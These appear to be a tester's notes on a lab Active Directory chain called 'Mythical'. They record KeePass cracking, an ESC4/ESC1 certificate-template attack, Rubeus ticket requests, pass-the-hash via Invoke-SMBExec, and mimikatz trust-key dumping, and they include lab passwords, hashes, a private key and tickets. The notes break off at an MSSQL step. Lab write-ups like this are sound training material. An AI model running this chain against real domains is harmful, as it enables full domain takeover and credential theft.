Mythical (Chain)

This is not a writeup, just my notes about the machine.

Credentials

Username	Password	Method	Scope
mythic_admin	wG4jmjNcEcfmzv3QbEcJdSVTDEjCnX	Provided by Client	Mythical Server
domjoin	hKvhexY5BtAgtWAY	Found on Keepass	domain user
Keepass Database	741852	Cracked from keepass database	Keepass database
svc_ldap	osaRXWkDf2y5SGh5	Disassembly binary	Domain User

✅ Valid Usernames

Administrator
Guest
krbtgt
Wendy.Adams
William.Jennings
Julie.Khan
Alan.Rhodes
Jay.Little
Owen.Dunn
Howard.Frost
Naomi.Campbell
Judith.Smith
Nicholas.Hill
Karl.Kaur
Hilary.Pearson
Marcus.Elliott
Fiona.Knight
Jay.Miller
Josephine.Smith
Mohammad.Jones
Glen.Price
Amber.Hussain
Megan.Higgins
Donald.Burton
Jasmine.Smith
Kim.Byrne
Jack.Chambers
Danielle.Andrews
svc_ldap
svc_sql
root

🔑 Passwords list

wG4jmjNcEcfmzv3QbEcJdSVTDEjCnX
hKvhexY5BtAgtWAY
741852
osaRXWkDf2y5SGh5

Information Gathering

Nmap Scan

Machine 1
-

Machine 2
22/tcp   open  ssh
7443/tcp open  oracleas-https

Machine 3
-

Compromise DC01 Server

Initial Access

Situational Awareness

• OS Name: Microsoft Windows Server 2022 Standard

• System Type: x64-based PC

• Current User: momo.ayase

  • MYTHICAL-US\Backup Admins

  • SeMachineAccountPrivilege (Create Computers)

• Domain: mythical-us.vl

• FQDN: dc01.mythical-us.vl

• Not kerberoastable and asreproastable users

Checking the ARP table.

Myhichal > shell arp -a

Interface: 192.168.25.2 --- 0xa
  Internet Address      Physical Address      Type
  192.168.25.1          00-ff-5d-3b-65-7a     dynamic   
  192.168.25.255        ff-ff-ff-ff-ff-ff     static    
  224.0.0.22            01-00-5e-00-00-16     static    
  224.0.0.251           01-00-5e-00-00-fb     static    
  224.0.0.252           01-00-5e-00-00-fc     static    
  255.255.255.255       ff-ff-ff-ff-ff-ff     static    

Interface: 10.10.154.117 --- 0xe
  Internet Address      Physical Address      Type
  10.10.154.113         0a-5c-d9-b1-d6-ef     dynamic   
  10.10.154.118         0a-35-98-7e-25-2b     dynamic   
  10.10.154.119         0a-10-74-82-61-e1     dynamic   
  10.10.154.127         ff-ff-ff-ff-ff-ff     static    
  169.254.169.250       0a-5c-d9-b1-d6-ef     dynamic   
  169.254.169.254       0a-5c-d9-b1-d6-ef     dynamic   
  224.0.0.22            01-00-5e-00-00-16     static    
  224.0.0.251           01-00-5e-00-00-fb     static    
  224.0.0.252           01-00-5e-00-00-fc     static    
  255.255.255.255       ff-ff-ff-ff-ff-ff     static    

Scanning the internal network

Tool: PortScanner

Myhichal > register_assembly PortScanner.exe
Myhichal > execute_assembly -Assembly PortScanner.exe  hosts=192.168.25.1,10.10.154.113,10.10.154.117,10.10.154.118,10.10.154.119,10.10.154.127 ports=21,22,25,53,53,80,110,137,138,139,143,2049,3000,3306,443,464,514,631,636,8080,873,8888,989,135,137,138,139,389,445,464,3268,3269,5000,5900,8000,1433,9389,8443,88

192.168.25.1 : port 22 is open.
192.168.25.1 : port 873 is open.
192.168.25.1 : port 80 is open.

10.10.154.117 : port 53 is open.
10.10.154.117 : port 53 is open.
10.10.154.117 : port 135 is open.
10.10.154.117 : port 139 is open.
10.10.154.117 : port 464 is open.
10.10.154.117 : port 389 is open.
10.10.154.117 : port 3268 is open.
10.10.154.117 : port 445 is open.
10.10.154.117 : port 3269 is open.
10.10.154.117 : port 464 is open.
10.10.154.117 : port 88 is open.
10.10.154.117 : port 139 is open.
10.10.154.117 : port 636 is open.
10.10.154.117 : port 9389 is open.

10.10.154.118 : port 22 is open.
10.10.154.118 : port 80 is open.

10.10.154.119 : port 53 is open.
10.10.154.119 : port 135 is open.
10.10.154.119 : port 53 is open.
10.10.154.119 : port 389 is open.
10.10.154.119 : port 139 is open.
10.10.154.119 : port 445 is open.
10.10.154.119 : port 464 is open.
10.10.154.119 : port 3268 is open.
10.10.154.119 : port 9389 is open.
10.10.154.119 : port 3269 is open.
10.10.154.119 : port 88 is open.
10.10.154.119 : port 636 is open.
10.10.154.119 : port 139 is open.
10.10.154.119 : port 464 is open.
10.10.154.119 : port 1433 is open.

Enumerating Rsync service and retrieving a keepass database

mythical > shell C:\_admin\cwrsync\bin\rsync.exe -av --list-only rsync://192.168.25.1
mythical       	Domain Backups

shell C:\_admin\cwrsync\bin\rsync.exe -av --list-only rsync://192.168.25.1/mythical
receiving incremental file list
drwxr-xr-x          4,096 2024/11/29 08:04:42 .
-rw-r--r--             37 2024/11/29 07:39:26 flag.txt
-rw-r--r--          1,605 2024/11/29 07:49:51 it.kdbx

mythical > shell C:\_admin\cwrsync\bin\rsync.exe -av rsync://192.168.25.1/mythical/flag.txt 
mythical > shell C:\_admin\cwrsync\bin\rsync.exe -av rsync://192.168.25.1/mythical/it.kdbx 

Worth file: it.kdbx

Cracking keepass database

Attempting to retrieve the database hash using keepass2john returned File version '40000' is currently not supported! which means the format is not supported.

❯ keepass2john it.kdbx
! it.kdbx : File version '40000' is currently not supported!

The tester used keepass4brute.sh instead.

#Installing dependencies
❯ sudo apt-get install keepassxc -y
❯ ./keepass4brute.sh it.kdbx /usr/share/seclists/Passwords/Leaked-Databases/rockyou-30.txt
keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute

[+] Words tested: 950/1556 - Attempts per minute: 105 - Estimated time remaining: 5 minutes, 46 seconds
[+] Current attempt: 741852

[*] Password found: 741852

Privilege escalation on DC01 via ESC4

Discovering the user domjoin can use ADSC

During the enumeration using bloodhound the tester found the user domjoins belongs to Certificate Service DCOM Access which members of this group are allowed to connect to Certification Authorities in the enterprise.

Discovering a vulnerable template to ESC4

The users Momo.Ayase and domjoin possesses the SeMachineAccountPrivilege, which allows the creation of computer accounts. This privilege, combined with the configuration of a vulnerable certificate template, fulfills all the necessary requirements to carry out an ESC4 attack. Specifically, the certificate template allows members of the MYTHICAL-US\Domain Computers group to enroll for certificates.

mythical > register_assembly Certify.exe
mythical > execute_assembly -Assembly Certify.exe -Arguments find /vulnerable


   _____          _   _  __              
  / ____|        | | (_)/ _|             
 | |     ___ _ __| |_ _| |_ _   _        
 | |    / _ \ '__| __| |  _| | | |      
 | |___|  __/ |  | |_| | | | |_| |       
  \_____\___|_|   \__|_|_|  \__, |   
                             __/ |       
                            |___./        
  v1.1.0                               

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=mythical-us,DC=vl'

[!] Vulnerable Certificates Templates :

    CA Name                               : dc01.mythical-us.vl\mythical-us-DC01-CA
    Template Name                         : Machine
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
    mspki-enrollment-flag                 : AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Server Authentication
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : MYTHICAL-US\Domain Admins     S-1-5-21-614429729-4048209472-3755682007-512
                                      MYTHICAL-US\Domain Computers  S-1-5-21-614429729-4048209472-3755682007-515
                                      MYTHICAL-US\Enterprise Admins S-1-5-21-614429729-4048209472-3755682007-519
      Object Control Permissions
        Owner                       : MYTHICAL-US\Enterprise Admins S-1-5-21-614429729-4048209472-3755682007-519
        WriteOwner Principals       : MYTHICAL-US\Domain Admins     S-1-5-21-614429729-4048209472-3755682007-512
                                      MYTHICAL-US\Domain Computers  S-1-5-21-614429729-4048209472-3755682007-515
                                      MYTHICAL-US\Enterprise Admins S-1-5-21-614429729-4048209472-3755682007-519
        WriteDacl Principals        : MYTHICAL-US\Domain Admins     S-1-5-21-614429729-4048209472-3755682007-512
                                      MYTHICAL-US\Domain Computers  S-1-5-21-614429729-4048209472-3755682007-515
                                      MYTHICAL-US\Enterprise Admins S-1-5-21-614429729-4048209472-3755682007-519
        WriteProperty Principals    : MYTHICAL-US\Domain Admins     S-1-5-21-614429729-4048209472-3755682007-512
                                      MYTHICAL-US\Domain Computers  S-1-5-21-614429729-4048209472-3755682007-515
                                      MYTHICAL-US\Enterprise Admins S-1-5-21-614429729-4048209472-3755682007-519

Certify completed in 00:00:13.3001595

Creating a computer account

The tester proceeded to create a computer account with possess full permission over Machine template.

mythical > make_token mythical-us.vl\domjoin hKvhexY5BtAgtWAY
mythical > register_assembly [Sharpmad.exe]
mythical > execute_assembly -Assembly Sharpmad.exe MAQ -Action new -MachineAccount z3r0 -MachinePassword password123
[+] Machine account z3r0 added

Abusing of template ESC4

Once the machine is created, the tester proceeded to impersonate the machine account for subsequently modify the machine template and make it vulnerable to ESC1.

mythical > make_token mythical-us.vl\z3r0$ password123
mythical > powershell_import PowerView.ps1
mythical > powershell Add-DomainObjectAcl -TargetIdentity Machine -PrincipalIdentity "Domain Users" -RightsGUID "0e10c968-78fb-11d2-90d4-00c04f79dc55" -TargetSearchBase "LDAP://CN=Configuration,DC=mythical-us,DC=vl" -Verbose
mythical > powershell Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=mythical-us,DC=vl" -Identity Machine -Set @{'mspki-certificate-name-flag'=1} -Verbose
mythical > powershell Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=mythical-us,DC=vl" -Identity Machine -Set @{'pkiextendedkeyusage'='1.3.6.1.5.5.7.3.2'} -Verbose
mythical > powershell Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=mythical-us,DC=vl" -Identity Machine -Set @{'mspki-certificate-application-policy'='1.3.6.1.5.5.7.3.2'} -Verbose

Abusing of template ESC1

Once the template is modified from ESC4 to ESC1 the tester proceeded to request a certificate template in behalf of Administrator account.

mythical > execute_assembly -Assembly Certify.exe request /ca:dc01.mythical-us.vl\mythical-us-DC01-CA /template:Machine /altname:Administrator

   _____          _   _  __              
  / ____|        | | (_)/ _|             
 | |     ___ _ __| |_ _| |_ _   _        
 | |    / _ \ '__| __| |  _| | | |      
 | |___|  __/ |  | |_| | | | |_| |       
  \_____\___|_|   \__|_|_|  \__, |   
                             __/ |       
                            |___./        
  v1.1.0                               

[*] Action: Request a Certificates

[*] Current user context    : MYTHICAL-US\Momo.Ayase
[*] No subject name specified, using current context as subject.

[*] Template                : Machine
[*] Subject                 : CN=Momo Ayase, OU=employees, DC=mythical-us, DC=vl
[*] AltName                 : Administrator

[*] Certificate Authority   : dc01.mythical-us.vl\mythical-us-DC01-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 6

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAs0RAkX3/eZbqhx3UK33Hk9OKQ3EXigocOTyXA/6TAoPgplKc
wWUa2mC89csmPSuFRLkvjcNq4c8U3QTFJNFhf0KiRnv1DbldSz32Ygax/m2YW6sj
Aiyoph5M8PY8tydGHZ8rK0QSpBMv0OsE/DSTVzNJ3sebgFUTcatx6pgKoYwaOP9X
OadXrHo5Qvd1LyXmduWnG+cenXS+cHMrEdXfEaoRGCS9j8vBdqe6XqFDt/rTALw5
FX04yevGLbE8CpZn1d1CZR6foSFkyU7FmmQUszTGQxW6av/OwApDvXztkOlDdkjq
waL2NWPVSAkPA0Cb2O/+Mw8CyxUVJ/QnVYHXaBo59/Y7jtAAYuLnbqXOoRFScVc5
XDAELFjZYAc6CVF9vr1hlp7XAoGAbkXJrdC2kJh83WohyATV1/JIHQ8y3JgmFuL/
LzpZ7uJuaZojVCWHlJSkmzo9B/xcFcwpz+EqQ8rXWrORQQZ7EJNEGrNncadh/Cmm
9RBcBXC/ShpQpANyMXOMMJSMsN0jmCsotMhvrg2Csfq/u6anW2ShuLJD2DQ/FK+6
fs3B57UCgYBqVMK9X1QVbWwVkB7mcC1NoSG6pm7fdHJUWc+HuYcX1/l0bacGsPoW
DO702PWBGLVtCjv/6j4cJe/ybx1bfBNoC1HiuBD3mbVE2LYAZdRPDjuLBr9CuCqf
SfbcAOZab0QiVQHH/APyAhDI4T3f3uJxqLXbflOwQzF2G98m1awGpw==
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGiTCCBHGgAwIBAgITJwAAAAbjmfLm93ya2AAAAAAABjANBgkqhkiG9w0BAQsF
ADBPMRIwEAYKCZImiZPyLGQBGRYCdmwxGzAZBgoJkiaJk/IsZAEZFgtteXRoaWNh
bC11czEcMBoGA1UEAxMTbXl0aGljYWwtdXMtREMwMS1DQTAeFw0yNTA1MTAwMTIz
MTZaFw0yNjA1MTAwMTIzMTZaMFoxEjAQBgoJkiaJk/IsZAEZFgJ2bDEbMBkGCgmS
JomT8ixkARkWC215dGhpY2FsLXVzMRIwEAYDVQQLEwllbXBsb3llZXMxEzARBgNV
BAMTCk1vbW8gQXlhc2UwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCz
c3w36BvY9GOURwg/Ex8UkgqZme+X4Ke6uc4S0ZwN0UGmPOuvhNazlqUPWJDZmSWj
mlRxR9xczoEvNC/ZTD4pjPpLwPyDGA2/mpVYMbei1MUY/DYE3FRNathb6AnavlcY
ywYfO2egOgaH0yKf8E48y8ipclP7Wm8KrshMhskSYUMzgHM3Fnb3/5B3LS9BQg9/
FXLPjB0lU0H12ysjgeiORY3wSwzwnGG8Izd7AC/B3YHrkjsYKk/1ut7KMvPWb6y3
J35HDR64rV+f616+Jawd5YAgCskZ/796EnCYbDj7AoQ2/b2edIpB/zK9lW+sjD9f
B6f18HAGXC+nV71tI3WjSxld1/xgDvGxSHJpDnWyOl703HP4gSJ/6tdhL/+Y
-----END CERTIFICATE-----

Intrusionz3r0@kali:$ openssl pkcs12 -in admin.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:

Request TGT using administrator certificate

Mythical > execute_assembly -Assembly Rubeus.exe asktgt /user:Administrator /certificate:C:\_admin\admin.pfx /getcredentials /nowrap
   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3 

[*] Action: Ask TGT

[*] Got domain: mythical-us.vl
[*] Using PKINIT with etype rc4_hmac and subject: CN=Momo Ayase, OU=employees, DC=mythical-us, DC=vl 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'mythical-us.vl\Administrator'
[*] Using domain controller: fe80::c7e0:a060:1ed5:2f97:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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

  ServiceName              :  krbtgt/mythical-us.vl
  ServiceRealm             :  MYTHICAL-US.VL
  UserName                 :  Administrator (NT_PRINCIPAL)
  UserRealm                :  MYTHICAL-US.VL
  StartTime                :  5/9/2025 6:51:06 PM
  EndTime                  :  5/10/2025 4:51:06 AM
  RenewTill                :  5/16/2025 6:51:06 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  2wCULMc6OnWNq1ytFDzaCA==
  ASREP (key)              :  1C7C7FA9FF23585C3DEE9FD18F999B04

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : C583EF48C5ED66C727AECB6FAB87AC12

Obtain a shell as Administrator using pass the hash.

mythical > powershell_import Invoke-SMBExec.ps1
mythical > powershell Invoke-SMBExec -Target DC01 -Domain mythical-us.vl -Username Administrator -Hash C583EF48C5ED66C727AECB6FAB87AC12 -Command "C:\ProgramData\google\update.exe"

Compromising DC02

Initial Access

Discovering a Outbound trust relationship

The tester identified that the domain mythical-us.vl has an outbound trust to mythical-eu.vl, meaning it accepts authentication from users in the mythical-eu.vl domain.

mythical > powershell_import PowerView.ps1
mythical > powershell Get-DomainTrust
SourceName      : mythical-us.vl
TargetName      : mythical-eu.vl
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FILTER_SIDS
TrustDirection  : Outbound
WhenCreated     : 12/3/2024 6:12:53 PM
WhenChanged     : 5/10/2025 1:26:04 AM

Obtaining the trust hash accounts

Using mimikatz, the tester dumped the trust relationship secrets and recovered the NTLM hash of the trust account MYTHICAL-US$, stored within mythical-eu.vl.

mythical > shell C:\Temp\mimikatz.exe privilege::debug "lsadump::trust /patch" exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::trust /patch

Current domain: MYTHICAL-US.VL (MYTHICAL-US / S-1-5-21-614429729-4048209472-3755682007)

Domain: MYTHICAL-EU.VL (MYTHICAL-EU / S-1-5-21-1148612195-3581135157-3534241443)
 [  In ] MYTHICAL-US.VL -> MYTHICAL-EU.VL

 [ Out ] MYTHICAL-EU.VL -> MYTHICAL-US.VL
    * 5/9/2025 6:26:04 PM - CLEAR   - 04 21 4d b3 36 46 d0 51 ed df 29 36 9d e2 8e d3 3e fb 63 51 ba 5f 95 ac b6 8c 14 23 18 d2 0d da 68 de e1 2c 07 26 45 9a 0b 30 e8 06 55 67 93 51 e4 43 2f dc 16 e9 86 33 ba 8a 44 06 52 12 2d aa 67 e0 bd 08 99 9d e9 3d 3a 4b 27 58 1f 12 3d 7f 32 44 e1 81 3c 8e fa 09 4b 17 43 70 dd aa ef 2c df 36 43 d7 27 20 76 18 75 aa 25 9a 95 9f 06 db 84 0b af b0 72 fd 8f 2b 20 ab 50 8d 4a c0 f6 1b 53 d7 83 74 e1 79 0d 4e 2f 9d d6 9a bb 7d 68 2f bc 7d 77 72 ea 04 88 7f 43 5a 1b 18 9a c6 81 96 e3 82 cd 58 28 5c 39 d8 80 8f 6d 99 ee 4f a0 75 29 97 d2 ee 6f 82 03 b8 3d 08 5c a7 14 82 2a 02 f3 15 8f 58 fe b9 63 60 f1 55 ba 6b a9 69 b6 be d8 38 79 5e 3a 18 75 f3 e1 fe 62 7d f5 fb 7f b5 9d e8 4b 36 4e 15 5e 32 63 a1 f0 3a d2 7c e3 bc 
	* aes256_hmac       1747706d71b79f85f7807a918f8e17ef527dc4834f9e4ea8c95d15b56b3d4785
	* aes128_hmac       427fc3a8831a6b64030b368422f038de
	* rc4_hmac_nt       5e2ba07271159d53eaa486a65b9a998b

 [ In-1] MYTHICAL-US.VL -> MYTHICAL-EU.VL

 [Out-1] MYTHICAL-EU.VL -> MYTHICAL-US.VL
    * 5/9/2025 6:26:04 PM - CLEAR   - a1 39 02 5e 0a 3d ce c0 af c9 6a ab 1c ea 0a 0a 7e 3f 20 d2 ea f6 95 93 c2 9f f8 7e 
	* aes256_hmac       cecbd91e50ff3ee7fbd725fbe9e2f3ea4d4445e549100607c3f2239307391076
	* aes128_hmac       652888ee3ab5fac7ea1ebf84e423d59d
	* rc4_hmac_nt       eb921a2b0e9d626559dab0f54fdc6498


mimikatz(commandline) # exit
Bye!

With this hash, the tester used Rubeus to request a Kerberos TGT on behalf of mythical-us$ from the mythical-eu.vl domain controller:

mythical > execute_assembly -Assembly Rubeus.exe asktgt /domain:mythical-eu.vl /user:mythical-us$ /rc4:5e2ba07271159d53eaa486a65b9a998b /nowrap

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3 

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 5e2ba07271159d53eaa486a65b9a998b
[*] Building AS-REQ (w/ preauth) for: 'mythical-eu.vl\mythical-us$'
[*] Using domain controller: 10.10.242.23:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFrjCCBaqgAwIBBaEDAgEWooIEuTCCBLVhggSxMIIEraADAgEFoRAbDk1ZVEhJQ0FMLUVVLlZMoiMwIaADAgECoRowGBsGa3JidGd0Gw5teXRoaWNhbC1ldS52bKOCBG0wggRpoAMCARKhAwIBAqKCBFsEggRXl+D/Ikig+nqoBDeETobF+ls+ZJEO0gsjmEUEzmbu1EnwRZNOGKpEM5RE/nAYg6+U6xWNtu4ZUqsTSU1Xf0Zl89nG5Kg2aALBPGE+882b6dfuOcC+wzMr70yBN2ICfsLKPK2ysrUg54xpYs7jtqUpyKTDryUnl4uPTidRwPWXhGLafDUWfpYiKfW7xDZg6b7vXtmgs1RmdRt0RlPZMtfSAEjIsJQib/IPh/dbGBJ9OfMYKwEV3bsZwU/0uqWDVAM/pkyJ31GlpvkmBe76pQ2ZDJYDHl4f6BTcqYiJ0JJO1z/1A90u8cEv6kROt8FUINrO5y7p0AYxMhmjI+yHOzn2NlWEalbuqGbNHdGTkGiWWz83Yi6W0KmZuzTaZlCKrM0xLLJfXy555MLiIjdB7kp941mjbEoWnmVjSlYx1pjwPoF0rw9uzGOjZWQmYIFEOo0dk1bqJOY8TZDlUjmTR89zsKF/7YZuSl8Qgja3aPOx8paKfwS+cWor+UfldXtu8YNuw51H+ckIUTv/q8atF6YcoaT/TU7+E4ymnY3yPI8X8tecn4Qcs1PltAZFB/3iRmvOcubjoSJapkRjGHtI/PcaElnVmzUOt9VCUN37n2mbIxUSQIf19eOyxFtf1aeRV/HWLD9xsgevx+kkUkR0Tsoz9HuUYyelrLdZqlar+14RFGv8gZ4zCZ57YAxKS/0VYuNUJqR6PY00pLnVnRy9lROBB6DTLsv5qgu2t5f0eaWQ0fYFif76hwAKei+iPQ+IqHhWgCFRhf+P9mf0LMdZZ+bProrRmvZsjwHQFghher4jpC78lt78Jxgu2kUtATum4Xn4bBAQxTCcxamIno/8tc6FZb781nlL1lRmzM4+Dq/9AaGnsLLRmTtAp7/ujWyppTWr4zTnTJzJwp+NctNdgpqkEPwoVuxUbB/g3fraIIWMHJnARSoBt3mXWoQBFs+mfhd3ptmGkf4pCwcJRjVrPK1hUyVkEJuxE5L4ZbM4Yy652XuA+tcZMA8y8+KDo7RSv91RzykwTIB2Nh0ASy6FNXaStWxr75fVlcJNSYcVSLk9UlDvtWDmU494h+Q4xTzLZUmeE4qEaPXjhk57LJbOMOb+rPZeLoDi88/7xXdP3kz852cIpbBatr8gLuERhhB19Z09RjxT3zZ6GIv24fx5Qp6LSbPbiKqi7YeYQq2TR1qkDlC08PiQYHJOBS1SPdwnvygUqEPJugix3cIz0tt8DFqjD69kCcOW6Bsddag+R2OmJ7BZpjPjw/HQKhZJfvPmreeziBAPFPQqx3DfCG56LjUmPOYhK5tEXfcypoybwyji9W2Ja3wUqyKerdAE/n4FVkq20YG8D8Xa/BuN2oBxwQ+fewYaDHuvAXHBlyYUA10fwsSmcp5zGrBR/ghY2ozH0iKMuOBLbFVOif7VxPHB0DuVxjFNTxRKw4mbS/sHszKXFz8g9JuObIQiYv/RAJIL7x1MJ0FhZPT1B6OB4DCB3aADAgEAooHVBIHSfYHPMIHMoIHJMIHGMIHDoBswGaADAgEXoRIEEHBt5qfeaZSd851uzoMd4Q+hEBsOTVlUSElDQUwtRVUuVkyiGTAXoAMCAQGhEDAOGwxteXRoaWNhbC11cySjBwMFAEDhAAClERgPMjAyNTA1MTAwMjI1MzJaphEYDzIwMjUwNTEwMTIyNTMyWqcRGA8yMDI1MDUxNzAyMjUzMlqoEBsOTVlUSElDQUwtRVUuVkypIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDm15dGhpY2FsLWV1LnZs

  ServiceName              :  krbtgt/mythical-eu.vl
  ServiceRealm             :  MYTHICAL-EU.VL
  UserName                 :  mythical-us$ (NT_PRINCIPAL)
  UserRealm                :  MYTHICAL-EU.VL
  StartTime                :  5/9/2025 7:25:32 PM
  EndTime                  :  5/10/2025 5:25:32 AM
  RenewTill                :  5/16/2025 7:25:32 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  cG3mp95plJ3znW7Ogx3hDw==
  ASREP (key)              :  5E2BA07271159D53EAA486A65B9A998B

Privilege escalation on DC02

Discovering a svc_ldap's plaintext credentials

The tester downloaded getusers.exe and proceeded to disassembly to analyze it.

Mythical > shell dir \\DC02.mythical-eu.vl\dev

 Volume in drive \\DC02.mythical-eu.vl\dev has no label.
 Volume Serial Number is CAB5-8F8F

 Directory of \\DC02.mythical-eu.vl\dev

11/29/2024  09:02 AM    <DIR>          .
11/29/2024  09:02 AM           441,224 Autologon64.exe
11/29/2024  09:00 AM             4,608 getusers.exe
               2 File(s)        445,832 bytes
               1 Dir(s)   9,443,155,968 bytes free

The tester found svc_ldap's plain text credentials within getusers.exe .

Credentials found: svc_ldap:osaRXWkDf2y5SGh5

Abusing Trustworthy Database

mythical > make_token -username mythical-eu.vl\svc_sql -password osaRXWkDf2y5SGh5
mythical > shell c:\_admin\abc.exe -S tcp:10.10.249.167,1433 -Q "SELECT name, database_id, create_date FROM sys.databases;"
